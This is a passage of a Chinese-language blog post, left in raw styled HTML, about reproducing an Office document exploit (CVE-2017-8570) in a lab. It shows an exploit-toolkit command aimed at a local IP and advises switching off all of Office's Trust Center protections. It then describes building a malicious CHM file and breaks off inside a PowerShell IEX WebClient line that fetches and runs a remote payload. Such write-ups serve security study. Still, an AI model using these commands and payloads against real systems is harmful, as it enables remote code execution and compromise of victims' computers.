font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">python</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">cve</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">2017</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">8570_toolkit.py</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">p</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">82</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">M</span>&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">exp</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">e</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">10.101.101.16</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><br/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7h0am5kog21gy0q61kx.gif" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">Ps:&nbsp;好多时候这个漏洞复现不成功，可以将查看&nbsp;文件&nbsp;->&nbsp;选项，点击&nbsp;信任中心设置，去掉设置中的所有勾取选项即可：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7h0pg358j20nl0j177l.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7h1ma6cmj20nl0iwgp2.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">第二种方法比较简单，用&nbsp;easy&nbsp;chm&nbsp;做一个恶意的&nbsp;chm&nbsp;：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7h270v2nj21hc0sojuk.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">其中我做的&nbsp;test.html&nbsp;我放在了</p><div id="crayon-5c25a60d4f7d2900595877" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 599.2px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7d2900595877-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">https</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//github.com/niexinming/safe_tool/blob/master/test.html</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">Ps:&nbsp;由于PARAM的value的长度似乎有某种限制，所以我把</p><div id="crayon-5c25a60d4f7e8452548655" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 600.8px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7e8452548655-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; 